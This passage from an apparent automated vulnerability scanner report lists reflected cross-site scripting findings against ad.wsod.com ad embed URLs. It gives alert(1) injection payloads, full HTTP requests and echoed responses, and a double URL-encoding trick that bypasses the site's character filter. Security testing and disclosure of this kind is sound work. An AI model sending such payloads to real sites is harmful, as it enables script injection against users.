Content-Length: 2645

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*&d34e8"><script>alert(1)</script>2724b554218=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.118. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [ybt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of the ybt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87684</script><script>alert(1)</script>1e254befa33 was submitted in the ybt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;831987684</script><script>alert(1)</script>1e254befa33&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2703

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830217**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;831987684</script><script>alert(1)</script>1e254befa33&&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208
...[SNIP]...

1.119. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [yhdata parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of the yhdata request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20fd3</script><script>alert(1)</script>d040a102cf7 was submitted in the yhdata parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=20fd3</script><script>alert(1)</script>d040a102cf7&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:35:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2703

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300829720**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=20fd3</script><script>alert(1)</script>d040a102cf7&yyob=&zip=,&ybt=17;89;274;8319&&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAAB
...[SNIP]...

1.120. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [yyob parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of the yyob request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5782</script><script>alert(1)</script>d07eafa992e was submitted in the yyob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=e5782</script><script>alert(1)</script>d07eafa992e&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:39:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2703

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300829941**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=e5782</script><script>alert(1)</script>d07eafa992e&zip=,&ybt=17;89;274;8319&&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=
...[SNIP]...

1.121. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [zip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca9e3</script><script>alert(1)</script>dcdf9dea63f was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,ca9e3</script><script>alert(1)</script>dcdf9dea63f&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:42:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2703

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830138**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,ca9e3</script><script>alert(1)</script>dcdf9dea63f&ybt=17;89;274;8319&&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8Um
...[SNIP]...

1.122. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee69%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2cd7641fbe8 was submitted in the REST URL parameter 2. This input was echoed as 3ee69"><script>alert(1)</script>2cd7641fbe8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313573ee69%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2cd7641fbe8/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2706

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313573ee69"><script>alert(1)</script>2cd7641fbe8/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.123. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1037%2522%253balert%25281%2529%252f%252f320359448bd was submitted in the REST URL parameter 2. This input was echoed as a1037";alert(1)//320359448bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357a1037%2522%253balert%25281%2529%252f%252f320359448bd/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2661

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357a1037";alert(1)//320359448bd/477.0.iframe.150x30/1300830342**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14
...[SNIP]...

1.124. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b7d7%2522%253balert%25281%2529%252f%252fd56f2e4f03f was submitted in the REST URL parameter 3. This input was echoed as 8b7d7";alert(1)//d56f2e4f03f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x308b7d7%2522%253balert%25281%2529%252f%252fd56f2e4f03f/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2661

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x308b7d7";alert(1)//d56f2e4f03f/1300830353**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin
...[SNIP]...

1.125. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae77b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecc07bf367e was submitted in the REST URL parameter 3. This input was echoed as ae77b"><script>alert(1)</script>cc07bf367e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30ae77b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecc07bf367e/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2703

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30ae77b"><script>alert(1)</script>cc07bf367e/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.126. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 903c1"><script>alert(1)</script>c509db9ea was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*903c1"><script>alert(1)</script>c509db9ea HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
